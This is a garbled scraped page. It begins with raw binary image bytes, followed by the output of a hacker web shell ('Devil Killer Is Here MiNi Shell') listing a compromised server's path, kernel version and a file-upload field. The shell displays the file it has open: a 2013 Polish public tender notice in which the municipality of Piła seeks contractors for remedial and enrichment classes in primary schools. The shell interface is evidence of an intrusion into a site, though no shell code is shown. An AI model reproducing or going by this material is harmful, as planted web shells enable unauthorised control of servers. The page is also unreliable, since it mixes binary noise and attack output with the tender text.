JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130118/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130118/26446-N-2013.html

<p class="kh_header"><b>Piła: ŚWIADCZENIE USŁUG EDUKACYJNYCH W RAMACH REALIZACJI PROJEKTU SYSTEMOWEGO NR POKL 09.01.02-30-181 łamane 12 pod nazwą Trampolina do sukcesu w klasach  I-III SZKÓŁ PODSTAWOWYCH  DLA KTÓRYCH ORGANEM PROWADZĄCYM JEST GMINA PIŁA.</b><br>
<b>Numer ogłoszenia: 26446 - 2013; data zamieszczenia: 18.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Piła , Pl. Staszica 10, 64-920 Piła, woj. wielkopolskie, tel. 067 2126210, faks 067 2123566.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.pila.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ŚWIADCZENIE USŁUG EDUKACYJNYCH W RAMACH REALIZACJI PROJEKTU SYSTEMOWEGO NR POKL 09.01.02-30-181 łamane 12 pod nazwą Trampolina do sukcesu w klasach  I-III SZKÓŁ PODSTAWOWYCH  DLA KTÓRYCH ORGANEM PROWADZĄCYM JEST GMINA PIŁA..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są usługi edukacyjne obejmujące przeprowadzenie zajęć dydaktycznych w ramach projektu systemowego Trampolina do sukcesu  w klasach  I - III szkół podstawowych dla których organem prowadzącym jest Gmina Piła. Projekt jest realizowany w ramach Programu Operacyjnego Kapitał Ludzki - Priorytet IX - Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1 - Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2 - Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych.
Celem głównym programu Trampolina do sukcesu jest wyrównywanie szans edukacyjnych uczniów i zmniejszanie dysproporcji w ich osiągnięciach edukacyjnych oraz podniesienie jakości procesu kształcenia poprzez indywidualizację procesu nauczania w klasach I - III we wszystkich szkołach podstawowych funkcjonujących w Gminie Piła. Program w szczególności obejmuje:
zajęcia dydaktyczno - wyrównawcze oraz specjalistyczne służące wyrównywaniu dysproporcji edukacyjnych w trakcie procesu kształcenia z zakresu: trudności w pisaniu i czytaniu oraz nauk matematycznych, doradztwo i opiekę pedagogiczno - psychologiczną dla uczniów wykazujących problemy w zachowaniu i komunikacji z otoczeniem lub z innych przyczyn zagrożonych przedwczesnym wypadnięciem z systemu oświaty, zajęcia dla uczniów ukierunkowane na rozwój kompetencji kluczowych, ze szczególnym uwzględnieniem uzdolnień matematycznych, przyrodniczych, muzycznych, plastycznych, teatralnych, języków obcych,
gimnastykę korekcyjną dla dzieci z wadami postawy, zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy, zajęcia specjalistyczne dla dzieci niepełnosprawnych  stymulacja polisensoryczna. 
 Cele szczegółowe:
zmniejszenie liczby uczniów z wadami postawy,
zmniejszenie liczby uczniów z zaburzeniami umiejętności szkolnych,
podniesienie poziomu wiedzy i umiejętności uczniów w obszarze realizacji podstawy programowej    w edukacji polonistycznej, matematycznej i przyrodniczej,
zmniejszenie skali występowania problemów związanych z zachowaniem się dzieci w szkole,
korekcja wad postawy i wad wymowy,
poprawa relacji międzyludzkich wśród uczestników projektu,
poszerzenie oferty edukacyjnej dla uczniów zdolnych - zajęć umożliwiających rozwijanie zainteresowań i talentów.
 W ramach tego projektu realizowane będą zadania skierowane do uczestników - uczniów klas I - III   w Szkole Podstawowej nr 1 im. Stanisława Staszica, Szkole Podstawowej nr 2 im. Olimpijczyków Polskich, Szkole Podstawowej nr 4 im. Mikołaja Kopernika, Szkole Podstawowej nr 5 im. Dzieci Polskich, Szkole Podstawowej nr 7 im. Adama Mickiewicza, Szkole Podstawowej Nr 12 z Oddziałami Integracyjnymi, Zespole Szkół nr 1 im. Jana Brzechwy, Zespole Szkół nr 2 im. Królowej Jadwigi, Zespole Szkół nr 3 im. Lotników Polskich. 
W ramach projektu realizowane będą zadania z następującego zakresu:
1) zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym zagrożonych  ryzykiem dysleksji - ogółem 900 godz., w tym: w SP1 - 30 godz. dla 5 dzieci; w SP2 - 150 godz. dla 25 dzieci; w SP4 - 60 godz. dla 10 dzieci; w SP5 - 60 godz. dla 7 dzieci; w SP7 - 60 godz. dla 10 dzieci; w SP12 - 60 godz. dla 16 dzieci; w ZS1 - 60 godz. dla 10 dzieci; w ZS2 - 240 godz. dla 40 dzieci; w ZS3 - 150 godz. dla 26 dzieci,
2) zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych - ogółem 330 godz., w tym: w SP2 - 90 godz. dla 18 dzieci; w SP4 - 30 godz. dla 8 dzieci;  w SP5 - 30 godz. dla 5 dzieci; w SP7 - 30 godz. dla 8 dzieci; w SP12 - 60 godz. dla 16 dzieci; w ZS1 - 30 godz. dla 6 dzieci; w ZS3 - 60 godz. dla 11 dzieci,
3) zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy - ogółem 1350 godz., w tym: w SP1 - 120 godz. dla 16 dzieci; w SP2 - 180 godz. dla 24 dzieci; w SP4 - 180 godz. dla 24 dzieci; w SP5 - 150 godz. dla 20 dzieci; w SP7 - 60 godz. dla 8 dzieci; w SP12 - 270 godz. dla 35 dzieci; w ZS1 - 90 godz. dla 12 dzieci; w ZS2 - 120 godz. dla 16 dzieci; w ZS3 - 180 godz. dla 17 dzieci,
4) zajęcia dla dzieci z zaburzeniami komunikacji społecznej - ogółem 210 godz., w tym: w SP2 - 30 godz. dla 6 dzieci; w SP4 - 90 godz. dla 30 dzieci; w SP5 - 30 godz. dla 5 dzieci, w SP12 - 30 godz. dla 10 dzieci, w ZS2 - 30 godz. dla 5 dzieci,
5) zajęcia dla dzieci z wadami postawy - gimnastyka korekcyjna - ogółem 1080 godz., w tym: w SP1 - 120 godz. dla 32 dzieci; w SP2 - 180 godz. dla 48 dzieci; w SP4 - 30 godz. dla 8 dzieci, w SP5 - 60 godz. dla 20 dzieci, w SP7 - 120 godz. dla 32 dzieci, w SP12 - 210 godz. dla 56 dzieci, w ZS1 - 60 godz. dla 14 dzieci, w ZS2 150 godz. dla 40 dzieci, w ZS3 - 150 godz. dla 35 dzieci,
6) zajęcia dla dzieci szczególnie uzdolnionych matematycznie - ogółem 450 godz., w tym: w SP1 - 60 godz. dla 16 dzieci; w SP2 - 60 godz. dla 10 dzieci; w SP4 - 60 godz. dla 16 dzieci; w SP7 - 30 godz. dla 8 dzieci; w SP12 - 90 godz. dla 24 dzieci; w ZS1 - 60 godz. dla 14 dzieci; w ZS2 90 godz. dla 24 dzieci,
7) zajęcia dla dzieci szczególnie uzdolnionych przyrodniczo - ogółem 300 godz., w tym: w SP1 - 30 godz. dla 8 dzieci; w SP2 - 60 godz. dla 10 dzieci; w SP4 - 30 godz. dla 8 dzieci; w SP5 - 30 godz. dla 6 dzieci; w SP7 - 60 godz. dla 16 dzieci; w SP12 - 90 godz. dla 23 dzieci,
8) zajęcia dla dzieci szczególnie uzdolnionych muzycznie i tanecznie - ogółem 60 godz., w tym: W SP1 60 godz. dla 16 dzieci,
9) zajęcia dla dzieci szczególnie uzdolnionych muzycznie - ogółem 300 godz., w tym: w SP2 - 60 godz. dla 16 dzieci; w SP4 - 60 godz. dla 16 dzieci; w SP12 - 90 godz. dla 20 dzieci; w ZS1 - 60 godz. dla 14 dzieci; w ZS2 30 godz. dla 8 dzieci,
10) zajęcia dla dzieci szczególnie uzdolnionych plastycznie - ogółem 510 godz., w tym: w SP1 - 60 godz. dla 16 dzieci; w SP2 - 60 godz. dla 16 dzieci; w SP4 - 90 godz. dla 24 dzieci; w SP5 - 30 godz. dla 6 dzieci; w SP7 - 30 godz. dla 8 dzieci; w SP12 - 60 godz. dla 11 dzieci; w ZS1 - 90 godz. dla 18 dzieci; w ZS2 - 90 godz. dla 24 dzieci,
11) zajęcia teatralne dla dzieci uzdolnionych - ogółem 120 godz., w tym: w SP1 - 60 godz. dla 16 dzieci; w SP4 - 60 godz. dla 16 dzieci,
12) zajęcia rozwijające uzdolnienia sportowe dzieci - ogółem 180 godz., w tym: SP1 - 120 godz. dla 32 dzieci; w SP5 - 60 godz. dla 12 dzieci,
13) zajęcia dla dzieci uzdolnionych manualnie - origami - ogółem 30 godz., w tym: SP2 - 30 godz. dla 8 dzieci,
14) zajęcia dla dzieci szczególnie uzdolnionych językowo - ogółem 60 godz., w tym: w SP4 - 60 godz. dla 16 dzieci,
15) zajęcia informatyczne dla dzieci zdolnych - ogółem 30 godz., w tym: w SP4 - 30 godz. dla 8 dzieci,
16) zajęcia dla dzieci niepełnosprawnych - stymulacja polisensoryczna - ogółem 60 godz., w tym: w SP12 - 60 godz. dla 8 dzieci,
17) zajęcia dla dzieci szczególnych uzdolnionych polonistycznie i środowiskowo - ogółem 90 godz., w tym: w ZS2 - 90 godz. dla 24 dzieci,
18) zajęcia wyrównawcze z języka angielskiego - ogółem 90 godz., w tym: w ZS2 - 90 godz. dla 24 dzieci.
Jednostka godzina w SIWZ używana jest w rozumieniu 1 godziny zegarowej, tj. 60 minut w odniesieniu do zajęć specjalistycznych:
a) zajęć dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym zagrożonych ryzykiem  dysleksji,
b) zajęć logopedycznych dla dzieci z zaburzeniami rozwoju mowy,
c) zajęć dla dzieci z zaburzeniami komunikacji społecznej,
d) zajęć dla dzieci z wadami postawy - gimnastyka korekcyjna,
e) zajęcia dla dzieci niepełnosprawnych - stymulacja polisensoryczna.
Dla pozostałych zajęć jednostka godzina w harmonogramie używana jest w rozumieniu 1 godziny lekcyjnej, tj. 45 minut.
Rozpoczęcie wyżej wymienionych zajęć przewidziane jest od dnia podpisania umowy do dnia 28 czerwca 2013 r. w wymiarze 30 godzin zajęć dla grupy,
w układzie:
luty 2013 r.  6 godzin zajęć dla grupy,
marzec 2013 r.  7 godzin zajęć dla grupy,
kwiecień 2013 r. 6 godzin zajęć dla grupy,
maj 2013 r.  6 godzin zajęć dla grupy,
czerwiec 2013 r. 	 5 godzin zajęć dla grupy.

W ramach projektu przewidziano realizację 6150 godzin zajęć dla 1294 uczestników projektu podzielonych na 205 grup.
W ramach uzgodnień w zakresie tworzenia harmonogramu realizacji zajęć Wykonawca powinien przestrzegać ponadto następujących zasad:
1) zajęcia mogą sie odbywać w dniach od poniedziałku do soboty,
2) zajęcia nie będą sie odbywać w niedziele,
3) ustalenie konkretnych dni oraz godzin zajęć w poszczególnych grupach powinno następować z uwzględnieniem planu lekcji uczniów wchodzących w skład grupy tak, aby nie pokrywały się one z godzinami lekcji uczniów w danym dniu,
4) zajęcia nie powinny odbywać się wcześniej aniżeli przed godzina 8.00, ani też później aniżeli po godzinie 19.00.
2. Obowiązki Wykonawcy:
Do obowiązków prowadzących zajęcia w ramach projektu systemowego Trampolina do sukcesu w klasach I - III szkół podstawowych, dla których organem prowadzącym jest Gmina Piła będzie należeć:
1) opracowanie na podstawie udostępnionych wyników badań i analiz potrzeb indywidualnych uczestników projektu (diagnoz) z danej szkoły podstawowej programu i planu pracy dla poszczególnych zajęć pozalekcyjnych dla danej grupy uczestników projektu zwanych dalej Programem pracy, i przedstawienie ich do akceptacji dyrektorowi danej szkoły, 
2) opracowanie szczegółowych planów zajęć grup uczniów danej szkoły podstawowej na podstawie informacji zawartych w załącznikach nr 8.1 - 8.9 do SIWZ -Harmonogramy realizacji zajęć projektu Trampolina do sukcesu, 
3) prowadzenie zajęć (według harmonogramu oraz przewidzianej liczby godzin zajęć) przez osoby posiadające kwalifikacje wymagane do nauczania danej grupy tematycznej, zgodnie z zakresem projektu wynikającym z opisu przedmiotu zamówienia w SIWZ i w myśl sporządzonego przez siebie Programu pracy zaakceptowanego przez Zleceniodawcę na zasadach określonych w pkt.1, 
4) dokumentowanie na bieżąco prowadzonych przez realizatorów zajęć pozalekcyjnych w postaci Kart czasu pracy oraz dzienników zajęć w celu bieżącego monitorowania obecności Beneficjentów Ostatecznych na prowadzonych zajęciach. Wszelkie nieobecności uczestników Projektu na zajęciach muszą być pisemnie usprawiedliwione przez rodziców i dołączone do dokumentacji, 
5) prawidłowe i systematyczne prowadzenie dokumentacji projektu oraz przekazywanie, co najmniej raz w miesiącu, informacji w formie elektronicznej i papierowej dyrektorowi szkoły,    w której realizowany jest Projekt oraz koordynatorowi Projektu o stanie realizacji planu zajęć, w tym liczby zrealizowanych godzin, a także powiadamianie o innych istotnych zdarzeniach, które wystąpiły podczas realizacji Projektu, 
6) wspomaganie promocji i ewaluacji Projektu - informowanie o współfinansowaniu Projektu ze środków Europejskiego Funduszu Społecznego oraz współpraca z koordynatorem Projektu     i szkolnymi opiekunami merytorycznymi w mierzeniu postępów uczniów w zakresie rezultatów Projektu, 
7) dokonywanie ewaluacji pracy dla zajęć pozalekcyjnych oraz dokonywanie ewaluacji osiągnięć rozwojowych uczniów (Beneficjentów Ostatecznych) pod kątem rozwoju postaw, umiejętności i poziomu wiedzy, w tym w zakresie rezultatów wskazanych w projekcie, 
8) opracowanie dokumentu podsumowującego realizację projektu z uwzględnieniem opisu   wykonania zaplanowanych rezultatów i produktów projektu, tj.:
a) twardych rezultatów projektu w postaci:
objęcia 1294 uczniów (100% uczniów ze szkół objętych projektem, dla których organem prowadzącym jest Gmina Piła, w tym 49,61procent chłopców oraz 50,39 procent dziewcząt) zajęciami wyrównawczymi oraz rozwijającymi ich zainteresowania, ograniczenia u 149 uczniów problemów związanych z nauką czytania i pisania, wyrównania wiedzy u 72 uczniów z zaburzeniami w zdobywaniu umiejętności  matematycznych, wyeliminowanie lub zmniejszenie problemu zaburzeń mowy u 172 dzieci,  wyeliminowanie kłopotów w komunikacji z otoczeniem u 56 uczniów,  korekty wad postawy u 285 uczniów, wyrównanie wiedzy z zakresu języka angielskiego u 24 uczniów, objęcie 8 uczniów niepełnosprawnych zajęciami terapeutycznymi, rozwoju zdolności: matematycznych u 112 dzieci,  przyrodniczych u 71 dzieci,  muzyczno-tanecznych u 16 dzieci, muzycznych u 74 dzieci, plastycznych  u 123 dzieci, teatralnych u 32 dzieci, sportowych u 44 dzieci, manualnych u 8 dzieci, językowych u 16 dzieci, informatycznych u 8 dzieci, polonistyczno-  środowiskowych u 24 dzieci.
b)  miękkich rezultatów projektu w postaci: 
poszerzenia wiedzy i umiejętności u 100procent uczniów biorących udział w zajęciach,
rozwoju zainteresowań i zdolności u 100 procent uczniów biorących udział w zajęciach,
wzrostu aspiracji u 100 procent uczestników projektu,
poprawy zdolności w zakresie funkcjonowania w społeczeństwie u 100 procent uczestników  projektu,
ograniczenia deficytów rozwojowych u 100 procent uczestników zajęć,
wzrostu umiejętności współpracy w zespole, samooceny oraz motywacji u biorących
udział w projekcie uczniów,

c)   pozostałych produktów w postaci:
przeprowadzenia zajęć w zakresie likwidacji braków u dzieci z zakresu:  umiejętności pisania i czytania, matematycznych, językowych oraz korekta  zaburzeń: wad wymowy, postawy, komunikacji z otoczeniem, zaburzeń u dzieci niepełnosprawnych  w łącznym wymiarze 4020 godzin, co stanowi 65,37 procent ogółu  godzin projektu,
przeprowadzenie zajęć rozwijających talenty i uzdolnienia dzieci z różnych dziedzin: matematycznej, przyrodniczej, muzyczno-tanecznych, muzycznych, plastycznych, teatralnych, sportowych, manualnych, językowych,  informatycznych, polonistyczno-środowiskowych w łącznym wymiarze 2130 godzin, co stanowi 34,63 procent ogółu godzin projektu.
9) ponoszenie odpowiedzialności materialnej za powierzone mienie, 
10) zobowiązanie do przestrzegania regulaminu szkoły i pracowni, w której prowadzone będą zajęcia, 
11) decydowanie o doborze metod i środków dydaktycznych w prowadzeniu zajęć ze szczególnym stosowaniem aktywizujących metod nauczania z naciskiem na umiejętność wykorzystania wiedzy w praktyce, 
12) przestrzeganie przepisów o ochronie danych osobowych w stosunku do wszystkich uczestników Projektu, 
13) przekazanie wykazu osób, które będą przetwarzać dane osobowe Beneficjentów Ostatecznych Projektu (BOP) w celu uzyskania upoważnienia od Prezydenta Miasta Piły do przetwarzania danych osobowych oraz wpisu do ewidencji osób upoważnionych do przetwarzania danych osobowych (Realizatorów Projektu) w związku z realizacją Projektu, 
14) przestrzeganie zasad zawartych w wytycznych dotyczących oznaczania projektów systemowych w ramach Programu Operacyjnego Kapitał Ludzki, które zamieszczone są na stronie internetowej Instytucji Pośredniczącej: www.efs.wup.poznan.pl, 
15) przygotowanie materiałów dydaktycznych dla uczestników zajęć. 
Szczegółowe informacje o terminach prowadzenia zajęć z podziałem na grupy BOP w danej szkole zawarte są w załącznikach  8.1 - 8.9 do SIWZ - Harmonogramy realizacji zajęć projektu Trampolina do sukcesu..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien udokumentować, że posiada niezbędną wiedzę i doświadczenie w wykonawstwie usługi edukacyjnej . W tym względzie udokumentuje, że w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał co najmniej 1 zamówienie związane z usługą edukacyjną realizowaną dla szkół dofinansowaną ze środków Europejskiego Funduszu Społecznego.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga, aby Wykonawca dysponował osobami, które będą uczestniczyć  w wykonywaniu zamówienia, posiadającymi wymagane uprawnienia do nauczania dzieci w klasach  I - III szkół podstawowych, zgodnie z rozporządzeniem Ministra Edukacji Narodowej z dnia 12. 03. 2009 r. w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli nie mających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli (Dz. U. Nr 50, poz. 400) z dnia 27. 03. 2009 r.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę nie mniejszą niż 200 000 zł (słownie: dwieście tysięcy złotych)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

